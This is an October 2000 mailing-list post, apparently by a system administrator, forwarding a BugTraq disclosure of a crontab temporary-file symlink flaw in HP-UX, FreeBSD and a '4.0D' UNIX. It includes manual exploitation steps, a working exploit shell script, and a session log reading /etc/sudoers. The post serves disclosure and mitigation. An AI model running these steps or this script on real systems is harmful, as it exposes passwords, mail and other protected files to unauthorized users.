Hi. There's a new vulnerability coming out of BugTraq that it seems to me
people would want to know about. On 4.0D, but not 4.0G, you can read any
file on the system, including mailboxes and files storing passwords,
anything in ascii format, possibly more. All you need is a login and
access to the crontab command.
What you can do is this:
edit your crontab: crontab -e
note the name of the temp file- /tmp/aaaa(something)
escape from vi to shell: :!sh
remove the temp file, and replace it with a soft link to the file you
want to read.
return to your crontab vi session, and attempt to file it.
crontab returns the contents of the file to screen, interspersed with
error messages about invalid format (your own crontab remains intact.)
For 4.0G, the problem wasn't there because crontab only gives you a
message that contents are invalid, and doesn't display the lines.
Below is the original BugTraq message about the vulnerability and
one of the posts answering it. Hope this helps. BTW, we found a
temporary solution by copying a 4.0G crontab program file to our 4.0D
machine. We'll also upgrade the 4.0D machine soon!
Ann Cantelow
-----------------------------------------
Date:Tue Oct 24 2000 10:03:04
Author:Kyong-won Cho < dubhe_at_hackerslab.com >
Message-ID:<003101c03d56$2a064670$071bebcb_at_swat.hackerslab.com>
[ Hackerslab bug_paper ] HP-UX crontab temporary file symbolic link
vulnerability
Attach
====================== crontab.sh ================================
#!/bin/sh
#
# HP-UX 11.00 crontab
#
# Kyong-won,Cho
#
# dubhe_at_hackerslab.com
#
# Usage : ./crontab.sh <distfile>
#
#
if [ -z "$1" ]
then
echo "Usage : $0 <distfile>"
exit
fi
cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh
ln -sf $1 \$1
_EOF_
chmod 755 /tmp/crontab_exp
EDITOR=/tmp/crontab_exp
export EDITOR
crontab -e 2> /tmp/crontab$$
grep -v "error on previous line" /tmp/crontab$$
rm -f /tmp/crontab_exp /tmp/crontab$$
==================================================end
---------- Forwarded message ----------
Date: Tue, 24 Oct 2000 20:55:29 +0400
From: Sergey Nenashev <alf_at_ISD.MEMONET.RU>
To: BUGTRAQ_at_SECURITYFOCUS.COM
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
symboliclink vulnerability
Hi,
Tested on
4.0-RELEASE FreeBSD 4.0-RELEASE #9
4.1-RELEASE FreeBSD 4.1-RELEASE #1:
Can read any file wich start with comment simbol (#)
$ ls -l /etc/sudoers
-r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
$ id
uid=1002(alf) gid=1002(alf) groups=1002(alf)
$ crontab -e
~
~
~
/tmp/crontab.hLmjTbK417
:!sh
[ #### Make simbolik link]
> rm /tmp/crontab.hLmjTbK417
> ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> exit
[ #### quit vi ]
/tmp/crontab.hLmjTbK417
crontab: installing new crontab
[ #### start crontab editor]
$ crontab -e
[####### See in vi]
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers
file.
#
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL) ALL
alf ALL=(ALL) ALL
~
~
~
If file started with no # then crontab sad
"/tmp/crontab.GAeNMP1357":2: bad minute
crontab: errors in crontab file, can't install
--
------
Alf Delems<alf_at_isd.memonet.ru>
Received on Thu Oct 26 2000 - 18:59:23 NZDT